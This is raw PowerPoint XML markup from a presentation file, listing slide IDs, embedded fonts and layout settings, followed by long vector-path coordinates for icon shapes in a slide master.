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6"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="264" r:id="rId2"/>
    <p:sldId id="265" r:id="rId3"/>
    <p:sldId id="266" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="263" r:id="rId6"/>
    <p:sldId id="267" r:id="rId7"/>
    <p:sldId id="268" r:id="rId8"/>
    <p:sldId id="269" r:id="rId9"/>
    <p:sldId id="274" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="272" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="277" r:id="rId16"/>
    <p:sldId id="276" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="279" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="284" r:id="rId21"/>
    <p:sldId id="283" r:id="rId22"/>
    <p:sldId id="282" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="280" r:id="rId25"/>
    <p:sldId id="286" r:id="rId26"/>
    <p:sldId id="287" r:id="rId27"/>
    <p:sldId id="292" r:id="rId28"/>
    <p:sldId id="291" r:id="rId29"/>
    <p:sldId id="290" r:id="rId30"/>
    <p:sldId id="289" r:id="rId31"/>
    <p:sldId id="288" r:id="rId32"/>
    <p:sldId id="296" r:id="rId33"/>
    <p:sldId id="295" r:id="rId34"/>
    <p:sldId id="294" r:id="rId35"/>
    <p:sldId id="293" r:id="rId36"/>
    <p:sldId id="306" r:id="rId37"/>
    <p:sldId id="305" r:id="rId38"/>
    <p:sldId id="304" r:id="rId39"/>
    <p:sldId id="303" r:id="rId40"/>
    <p:sldId id="307" r:id="rId41"/>
    <p:sldId id="302" r:id="rId42"/>
    <p:sldId id="301" r:id="rId43"/>
    <p:sldId id="300" r:id="rId44"/>
    <p:sldId id="299" r:id="rId45"/>
    <p:sldId id="298" r:id="rId46"/>
    <p:sldId id="309" r:id="rId47"/>
    <p:sldId id="297" r:id="rId48"/>
    <p:sldId id="308" r:id="rId49"/>
    <p:sldId id="310" r:id="rId50"/>
    <p:sldId id="311" r:id="rId51"/>
    <p:sldId id="317" r:id="rId52"/>
    <p:sldId id="316" r:id="rId53"/>
    <p:sldId id="315" r:id="rId54"/>
    <p:sldId id="314" r:id="rId55"/>
    <p:sldId id="313" r:id="rId56"/>
    <p:sldId id="312" r:id="rId57"/>
    <p:sldId id="324" r:id="rId58"/>
    <p:sldId id="320" r:id="rId59"/>
    <p:sldId id="319" r:id="rId60"/>
    <p:sldId id="318" r:id="rId61"/>
    <p:sldId id="323" r:id="rId62"/>
    <p:sldId id="322" r:id="rId63"/>
    <p:sldId id="321" r:id="rId64"/>
    <p:sldId id="261" r:id="rId65"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId67"/>
      <p:bold r:id="rId68"/>
      <p:italic r:id="rId69"/>
      <p:boldItalic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华文新魏" panose="02010600030101010101" charset="-122"/>
      <p:regular r:id="rId75"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro" panose="02010600030101010101" charset="0"/>
      <p:regular r:id="rId76"/>
      <p:bold r:id="rId77"/>
      <p:italic r:id="rId78"/>
      <p:boldItalic r:id="rId79"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
      <p:regular r:id="rId80"/>
      <p:bold r:id="rId81"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans Semibold" panose="020B0706030804020204" pitchFamily="34" charset="0"/>
      <p:bold r:id="rId82"/>
      <p:boldItalic r:id="rId83"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans Extrabold" panose="020B0906030804020204" pitchFamily="34" charset="0"/>
      <p:bold r:id="rId84"/>
      <p:boldItalic r:id="rId85"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Andalus" panose="02020603050405020304" pitchFamily="18" charset="-78"/>
      <p:regular r:id="rId86"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:custDataLst>
    <p:tags r:id="rId8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4A4A"/>
    <a:srgbClr val="EA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710" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="113" d="100"/>
          <a:sy n="113" d="100"/>
        </p:scale>
        <p:origin x="25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76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font10.fntdata"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font18.fntdata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87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06CF4-FA77-4E71-BDBB-B62F97D48318}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/10/22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EA511-84E0-4AE0-9842-AB0E10994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11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D2D48-FFAB-4DA8-AB86-713F8E41C8A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1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D2D48-FFAB-4DA8-AB86-713F8E41C8A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0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圆角矩形标注 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A793890F-225F-4C28-B4BE-00A8272DE732}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1745725" y="2466277"/>
            <a:ext cx="5943600" cy="1453896"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42679"/>
              <a:gd name="adj2" fmla="val 73192"/>
              <a:gd name="adj3" fmla="val 16667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F041282-AD7D-42FA-856D-F29FE9BA430D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-82177" y="-134484"/>
            <a:ext cx="12356354" cy="7126968"/>
            <a:chOff x="-64979" y="-137511"/>
            <a:chExt cx="12356354" cy="7126968"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="5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69E579DA-21E5-4221-A5C8-A3B1586B4E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767775">
              <a:off x="-47644" y="1201848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F35AA57-2B07-4D2E-AAAF-225BA4861F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5145695">
              <a:off x="5320634" y="1537188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0241EB5-402B-43F3-9429-3DA4FB9D4F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058153">
              <a:off x="4559094" y="2564615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B1ABDA51-2EAB-4833-A43E-E893BD505E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164480">
              <a:off x="3703956" y="1701791"/>
              <a:ext cx="720725" cy="695325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 165 w 192"/>
                <a:gd name="T1" fmla="*/ 65 h 185"/>
                <a:gd name="T2" fmla="*/ 192 w 192"/>
                <a:gd name="T3" fmla="*/ 137 h 185"/>
                <a:gd name="T4" fmla="*/ 0 w 192"/>
                <a:gd name="T5" fmla="*/ 185 h 185"/>
                <a:gd name="T6" fmla="*/ 11 w 192"/>
                <a:gd name="T7" fmla="*/ 137 h 185"/>
                <a:gd name="T8" fmla="*/ 43 w 192"/>
                <a:gd name="T9" fmla="*/ 49 h 185"/>
                <a:gd name="T10" fmla="*/ 105 w 192"/>
                <a:gd name="T11" fmla="*/ 49 h 185"/>
                <a:gd name="T12" fmla="*/ 112 w 192"/>
                <a:gd name="T13" fmla="*/ 36 h 185"/>
                <a:gd name="T14" fmla="*/ 83 w 192"/>
                <a:gd name="T15" fmla="*/ 0 h 185"/>
                <a:gd name="T16" fmla="*/ 164 w 192"/>
                <a:gd name="T17" fmla="*/ 36 h 185"/>
                <a:gd name="T18" fmla="*/ 136 w 192"/>
                <a:gd name="T19" fmla="*/ 49 h 185"/>
                <a:gd name="T20" fmla="*/ 148 w 192"/>
                <a:gd name="T21" fmla="*/ 28 h 185"/>
                <a:gd name="T22" fmla="*/ 100 w 192"/>
                <a:gd name="T23" fmla="*/ 9 h 185"/>
                <a:gd name="T24" fmla="*/ 148 w 192"/>
                <a:gd name="T25" fmla="*/ 28 h 185"/>
                <a:gd name="T26" fmla="*/ 148 w 192"/>
                <a:gd name="T27" fmla="*/ 104 h 185"/>
                <a:gd name="T28" fmla="*/ 136 w 192"/>
                <a:gd name="T29" fmla="*/ 92 h 185"/>
                <a:gd name="T30" fmla="*/ 136 w 192"/>
                <a:gd name="T31" fmla="*/ 116 h 185"/>
                <a:gd name="T32" fmla="*/ 148 w 192"/>
                <a:gd name="T33" fmla="*/ 128 h 185"/>
                <a:gd name="T34" fmla="*/ 136 w 192"/>
                <a:gd name="T35" fmla="*/ 116 h 185"/>
                <a:gd name="T36" fmla="*/ 124 w 192"/>
                <a:gd name="T37" fmla="*/ 104 h 185"/>
                <a:gd name="T38" fmla="*/ 112 w 192"/>
                <a:gd name="T39" fmla="*/ 92 h 185"/>
                <a:gd name="T40" fmla="*/ 112 w 192"/>
                <a:gd name="T41" fmla="*/ 116 h 185"/>
                <a:gd name="T42" fmla="*/ 124 w 192"/>
                <a:gd name="T43" fmla="*/ 128 h 185"/>
                <a:gd name="T44" fmla="*/ 112 w 192"/>
                <a:gd name="T45" fmla="*/ 116 h 185"/>
                <a:gd name="T46" fmla="*/ 124 w 192"/>
                <a:gd name="T47" fmla="*/ 80 h 185"/>
                <a:gd name="T48" fmla="*/ 112 w 192"/>
                <a:gd name="T49" fmla="*/ 68 h 185"/>
                <a:gd name="T50" fmla="*/ 136 w 192"/>
                <a:gd name="T51" fmla="*/ 68 h 185"/>
                <a:gd name="T52" fmla="*/ 148 w 192"/>
                <a:gd name="T53" fmla="*/ 80 h 185"/>
                <a:gd name="T54" fmla="*/ 136 w 192"/>
                <a:gd name="T55" fmla="*/ 68 h 185"/>
                <a:gd name="T56" fmla="*/ 12 w 192"/>
                <a:gd name="T57" fmla="*/ 168 h 185"/>
                <a:gd name="T58" fmla="*/ 179 w 192"/>
                <a:gd name="T59" fmla="*/ 148 h 185"/>
                <a:gd name="T60" fmla="*/ 96 w 192"/>
                <a:gd name="T61" fmla="*/ 68 h 185"/>
                <a:gd name="T62" fmla="*/ 36 w 192"/>
                <a:gd name="T63" fmla="*/ 96 h 185"/>
                <a:gd name="T64" fmla="*/ 96 w 192"/>
                <a:gd name="T65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85">
                  <a:moveTo>
                    <a:pt x="147" y="49"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="49"/>
                    <a:pt x="165" y="57"/>
                    <a:pt x="165" y="65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57"/>
                    <a:pt x="33" y="49"/>
                    <a:pt x="43" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="49"/>
                    <a:pt x="70" y="49"/>
                    <a:pt x="95" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="49"/>
                    <a:pt x="101" y="49"/>
                    <a:pt x="105" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="49"/>
                    <a:pt x="110" y="49"/>
                    <a:pt x="112" y="49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42" y="49"/>
                    <a:pt x="147" y="49"/>
                    <a:pt x="147" y="49"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="148" y="28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28"/>
                    <a:pt x="100" y="28"/>
                    <a:pt x="100" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="148" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="136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36" y="92"/>
                    <a:pt x="136" y="92"/>
                    <a:pt x="136" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136" y="104"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="136" y="116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40" y="128"/>
                    <a:pt x="142" y="128"/>
                    <a:pt x="148" y="128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36" y="116"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="11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104"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="112" y="116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7" y="128"/>
                    <a:pt x="120" y="128"/>
                    <a:pt x="124" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="116"/>
                    <a:pt x="124" y="116"/>
                    <a:pt x="124" y="116"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="116"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="112" y="80"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="80"/>
                    <a:pt x="124" y="80"/>
                    <a:pt x="124" y="80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0" y="68"/>
                    <a:pt x="117" y="68"/>
                    <a:pt x="112" y="68"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="80"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="136" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="80"/>
                    <a:pt x="136" y="80"/>
                    <a:pt x="13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38" y="68"/>
                    <a:pt x="142" y="68"/>
                    <a:pt x="136" y="68"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="12" y="14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9" y="148"/>
                    <a:pt x="179" y="148"/>
                    <a:pt x="179" y="148"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12" y="148"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="96" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="68"/>
                    <a:pt x="52" y="68"/>
                    <a:pt x="36" y="68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51" y="96"/>
                    <a:pt x="75" y="96"/>
                    <a:pt x="96" y="96"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96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BF4499A3-F2C9-4D79-B37F-9A6FF7268A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6885">
              <a:off x="8109833" y="847785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13A6DD76-FE5A-48E0-9339-19F9357F27A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567118">
              <a:off x="6851410" y="2471398"/>
              <a:ext cx="750888" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 193 w 200"/>
                <a:gd name="T1" fmla="*/ 148 h 200"/>
                <a:gd name="T2" fmla="*/ 158 w 200"/>
                <a:gd name="T3" fmla="*/ 148 h 200"/>
                <a:gd name="T4" fmla="*/ 134 w 200"/>
                <a:gd name="T5" fmla="*/ 126 h 200"/>
                <a:gd name="T6" fmla="*/ 159 w 200"/>
                <a:gd name="T7" fmla="*/ 104 h 200"/>
                <a:gd name="T8" fmla="*/ 193 w 200"/>
                <a:gd name="T9" fmla="*/ 104 h 200"/>
                <a:gd name="T10" fmla="*/ 200 w 200"/>
                <a:gd name="T11" fmla="*/ 110 h 200"/>
                <a:gd name="T12" fmla="*/ 200 w 200"/>
                <a:gd name="T13" fmla="*/ 141 h 200"/>
                <a:gd name="T14" fmla="*/ 193 w 200"/>
                <a:gd name="T15" fmla="*/ 148 h 200"/>
                <a:gd name="T16" fmla="*/ 152 w 200"/>
                <a:gd name="T17" fmla="*/ 117 h 200"/>
                <a:gd name="T18" fmla="*/ 143 w 200"/>
                <a:gd name="T19" fmla="*/ 126 h 200"/>
                <a:gd name="T20" fmla="*/ 152 w 200"/>
                <a:gd name="T21" fmla="*/ 136 h 200"/>
                <a:gd name="T22" fmla="*/ 162 w 200"/>
                <a:gd name="T23" fmla="*/ 126 h 200"/>
                <a:gd name="T24" fmla="*/ 152 w 200"/>
                <a:gd name="T25" fmla="*/ 117 h 200"/>
                <a:gd name="T26" fmla="*/ 134 w 200"/>
                <a:gd name="T27" fmla="*/ 152 h 200"/>
                <a:gd name="T28" fmla="*/ 192 w 200"/>
                <a:gd name="T29" fmla="*/ 152 h 200"/>
                <a:gd name="T30" fmla="*/ 192 w 200"/>
                <a:gd name="T31" fmla="*/ 166 h 200"/>
                <a:gd name="T32" fmla="*/ 160 w 200"/>
                <a:gd name="T33" fmla="*/ 200 h 200"/>
                <a:gd name="T34" fmla="*/ 33 w 200"/>
                <a:gd name="T35" fmla="*/ 200 h 200"/>
                <a:gd name="T36" fmla="*/ 0 w 200"/>
                <a:gd name="T37" fmla="*/ 166 h 200"/>
                <a:gd name="T38" fmla="*/ 0 w 200"/>
                <a:gd name="T39" fmla="*/ 87 h 200"/>
                <a:gd name="T40" fmla="*/ 33 w 200"/>
                <a:gd name="T41" fmla="*/ 52 h 200"/>
                <a:gd name="T42" fmla="*/ 160 w 200"/>
                <a:gd name="T43" fmla="*/ 52 h 200"/>
                <a:gd name="T44" fmla="*/ 192 w 200"/>
                <a:gd name="T45" fmla="*/ 87 h 200"/>
                <a:gd name="T46" fmla="*/ 192 w 200"/>
                <a:gd name="T47" fmla="*/ 100 h 200"/>
                <a:gd name="T48" fmla="*/ 133 w 200"/>
                <a:gd name="T49" fmla="*/ 100 h 200"/>
                <a:gd name="T50" fmla="*/ 134 w 200"/>
                <a:gd name="T51" fmla="*/ 152 h 200"/>
                <a:gd name="T52" fmla="*/ 117 w 200"/>
                <a:gd name="T53" fmla="*/ 21 h 200"/>
                <a:gd name="T54" fmla="*/ 60 w 200"/>
                <a:gd name="T55" fmla="*/ 44 h 200"/>
                <a:gd name="T56" fmla="*/ 27 w 200"/>
                <a:gd name="T57" fmla="*/ 44 h 200"/>
                <a:gd name="T58" fmla="*/ 121 w 200"/>
                <a:gd name="T59" fmla="*/ 0 h 200"/>
                <a:gd name="T60" fmla="*/ 155 w 200"/>
                <a:gd name="T61" fmla="*/ 44 h 200"/>
                <a:gd name="T62" fmla="*/ 134 w 200"/>
                <a:gd name="T63" fmla="*/ 44 h 200"/>
                <a:gd name="T64" fmla="*/ 117 w 200"/>
                <a:gd name="T65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200">
                  <a:moveTo>
                    <a:pt x="193" y="148"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="148"/>
                    <a:pt x="177" y="148"/>
                    <a:pt x="158" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="148"/>
                    <a:pt x="134" y="144"/>
                    <a:pt x="134" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="110"/>
                    <a:pt x="144" y="104"/>
                    <a:pt x="159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7" y="104"/>
                    <a:pt x="200" y="107"/>
                    <a:pt x="200" y="11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197" y="148"/>
                    <a:pt x="193" y="148"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="152" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="117"/>
                    <a:pt x="143" y="121"/>
                    <a:pt x="143" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="132"/>
                    <a:pt x="147" y="136"/>
                    <a:pt x="152" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="136"/>
                    <a:pt x="162" y="132"/>
                    <a:pt x="162" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="121"/>
                    <a:pt x="158" y="117"/>
                    <a:pt x="152" y="117"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="152"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="152"/>
                    <a:pt x="180" y="152"/>
                    <a:pt x="192" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="160"/>
                    <a:pt x="192" y="166"/>
                    <a:pt x="192" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="185"/>
                    <a:pt x="178" y="200"/>
                    <a:pt x="160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15" y="200"/>
                    <a:pt x="0" y="185"/>
                    <a:pt x="0" y="1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15" y="52"/>
                    <a:pt x="33" y="52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78" y="52"/>
                    <a:pt x="192" y="68"/>
                    <a:pt x="192" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="87"/>
                    <a:pt x="192" y="92"/>
                    <a:pt x="192" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="100"/>
                    <a:pt x="150" y="100"/>
                    <a:pt x="133" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="100"/>
                    <a:pt x="120" y="152"/>
                    <a:pt x="134" y="152"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="117" y="21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34" y="44"/>
                    <a:pt x="134" y="44"/>
                    <a:pt x="134" y="44"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="117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7D7BBE02-DBE8-47BF-A9ED-A246CC7F83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786341">
              <a:off x="11120115" y="1879845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CB515A88-75E9-4ECE-93E2-9097AEE248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1311" y="2325220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0B2D70DA-A158-4471-8CD2-5F7BEA7BC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91482">
              <a:off x="1247068" y="4064312"/>
              <a:ext cx="892239" cy="899464"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172 w 209"/>
                <a:gd name="T1" fmla="*/ 37 h 210"/>
                <a:gd name="T2" fmla="*/ 37 w 209"/>
                <a:gd name="T3" fmla="*/ 37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7 h 210"/>
                <a:gd name="T10" fmla="*/ 135 w 209"/>
                <a:gd name="T11" fmla="*/ 158 h 210"/>
                <a:gd name="T12" fmla="*/ 124 w 209"/>
                <a:gd name="T13" fmla="*/ 160 h 210"/>
                <a:gd name="T14" fmla="*/ 105 w 209"/>
                <a:gd name="T15" fmla="*/ 157 h 210"/>
                <a:gd name="T16" fmla="*/ 88 w 209"/>
                <a:gd name="T17" fmla="*/ 153 h 210"/>
                <a:gd name="T18" fmla="*/ 69 w 209"/>
                <a:gd name="T19" fmla="*/ 160 h 210"/>
                <a:gd name="T20" fmla="*/ 61 w 209"/>
                <a:gd name="T21" fmla="*/ 142 h 210"/>
                <a:gd name="T22" fmla="*/ 73 w 209"/>
                <a:gd name="T23" fmla="*/ 128 h 210"/>
                <a:gd name="T24" fmla="*/ 77 w 209"/>
                <a:gd name="T25" fmla="*/ 115 h 210"/>
                <a:gd name="T26" fmla="*/ 77 w 209"/>
                <a:gd name="T27" fmla="*/ 112 h 210"/>
                <a:gd name="T28" fmla="*/ 61 w 209"/>
                <a:gd name="T29" fmla="*/ 112 h 210"/>
                <a:gd name="T30" fmla="*/ 61 w 209"/>
                <a:gd name="T31" fmla="*/ 93 h 210"/>
                <a:gd name="T32" fmla="*/ 73 w 209"/>
                <a:gd name="T33" fmla="*/ 93 h 210"/>
                <a:gd name="T34" fmla="*/ 70 w 209"/>
                <a:gd name="T35" fmla="*/ 75 h 210"/>
                <a:gd name="T36" fmla="*/ 74 w 209"/>
                <a:gd name="T37" fmla="*/ 59 h 210"/>
                <a:gd name="T38" fmla="*/ 87 w 209"/>
                <a:gd name="T39" fmla="*/ 48 h 210"/>
                <a:gd name="T40" fmla="*/ 106 w 209"/>
                <a:gd name="T41" fmla="*/ 44 h 210"/>
                <a:gd name="T42" fmla="*/ 130 w 209"/>
                <a:gd name="T43" fmla="*/ 52 h 210"/>
                <a:gd name="T44" fmla="*/ 141 w 209"/>
                <a:gd name="T45" fmla="*/ 73 h 210"/>
                <a:gd name="T46" fmla="*/ 120 w 209"/>
                <a:gd name="T47" fmla="*/ 76 h 210"/>
                <a:gd name="T48" fmla="*/ 114 w 209"/>
                <a:gd name="T49" fmla="*/ 65 h 210"/>
                <a:gd name="T50" fmla="*/ 105 w 209"/>
                <a:gd name="T51" fmla="*/ 61 h 210"/>
                <a:gd name="T52" fmla="*/ 95 w 209"/>
                <a:gd name="T53" fmla="*/ 65 h 210"/>
                <a:gd name="T54" fmla="*/ 91 w 209"/>
                <a:gd name="T55" fmla="*/ 75 h 210"/>
                <a:gd name="T56" fmla="*/ 92 w 209"/>
                <a:gd name="T57" fmla="*/ 84 h 210"/>
                <a:gd name="T58" fmla="*/ 94 w 209"/>
                <a:gd name="T59" fmla="*/ 93 h 210"/>
                <a:gd name="T60" fmla="*/ 120 w 209"/>
                <a:gd name="T61" fmla="*/ 93 h 210"/>
                <a:gd name="T62" fmla="*/ 120 w 209"/>
                <a:gd name="T63" fmla="*/ 112 h 210"/>
                <a:gd name="T64" fmla="*/ 98 w 209"/>
                <a:gd name="T65" fmla="*/ 112 h 210"/>
                <a:gd name="T66" fmla="*/ 98 w 209"/>
                <a:gd name="T67" fmla="*/ 114 h 210"/>
                <a:gd name="T68" fmla="*/ 96 w 209"/>
                <a:gd name="T69" fmla="*/ 125 h 210"/>
                <a:gd name="T70" fmla="*/ 87 w 209"/>
                <a:gd name="T71" fmla="*/ 139 h 210"/>
                <a:gd name="T72" fmla="*/ 97 w 209"/>
                <a:gd name="T73" fmla="*/ 136 h 210"/>
                <a:gd name="T74" fmla="*/ 102 w 209"/>
                <a:gd name="T75" fmla="*/ 137 h 210"/>
                <a:gd name="T76" fmla="*/ 108 w 209"/>
                <a:gd name="T77" fmla="*/ 138 h 210"/>
                <a:gd name="T78" fmla="*/ 121 w 209"/>
                <a:gd name="T79" fmla="*/ 141 h 210"/>
                <a:gd name="T80" fmla="*/ 136 w 209"/>
                <a:gd name="T81" fmla="*/ 136 h 210"/>
                <a:gd name="T82" fmla="*/ 145 w 209"/>
                <a:gd name="T83" fmla="*/ 155 h 210"/>
                <a:gd name="T84" fmla="*/ 135 w 209"/>
                <a:gd name="T85" fmla="*/ 15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10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5" y="210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35" y="158"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="159"/>
                    <a:pt x="127" y="160"/>
                    <a:pt x="124" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="160"/>
                    <a:pt x="113" y="159"/>
                    <a:pt x="105" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="154"/>
                    <a:pt x="92" y="153"/>
                    <a:pt x="88" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="153"/>
                    <a:pt x="76" y="156"/>
                    <a:pt x="69" y="160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7" y="137"/>
                    <a:pt x="71" y="133"/>
                    <a:pt x="73" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="124"/>
                    <a:pt x="77" y="119"/>
                    <a:pt x="77" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="114"/>
                    <a:pt x="77" y="114"/>
                    <a:pt x="77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87"/>
                    <a:pt x="70" y="81"/>
                    <a:pt x="70" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="70"/>
                    <a:pt x="71" y="64"/>
                    <a:pt x="74" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="54"/>
                    <a:pt x="82" y="50"/>
                    <a:pt x="87" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="45"/>
                    <a:pt x="99" y="44"/>
                    <a:pt x="106" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="44"/>
                    <a:pt x="124" y="46"/>
                    <a:pt x="130" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="57"/>
                    <a:pt x="139" y="64"/>
                    <a:pt x="141" y="7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9" y="71"/>
                    <a:pt x="117" y="67"/>
                    <a:pt x="114" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="62"/>
                    <a:pt x="109" y="61"/>
                    <a:pt x="105" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="61"/>
                    <a:pt x="97" y="62"/>
                    <a:pt x="95" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="68"/>
                    <a:pt x="91" y="71"/>
                    <a:pt x="91" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="78"/>
                    <a:pt x="91" y="80"/>
                    <a:pt x="92" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="87"/>
                    <a:pt x="93" y="90"/>
                    <a:pt x="94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4"/>
                    <a:pt x="98" y="113"/>
                    <a:pt x="98" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="118"/>
                    <a:pt x="97" y="122"/>
                    <a:pt x="96" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="129"/>
                    <a:pt x="91" y="133"/>
                    <a:pt x="87" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="137"/>
                    <a:pt x="93" y="136"/>
                    <a:pt x="97" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="136"/>
                    <a:pt x="100" y="137"/>
                    <a:pt x="102" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="137"/>
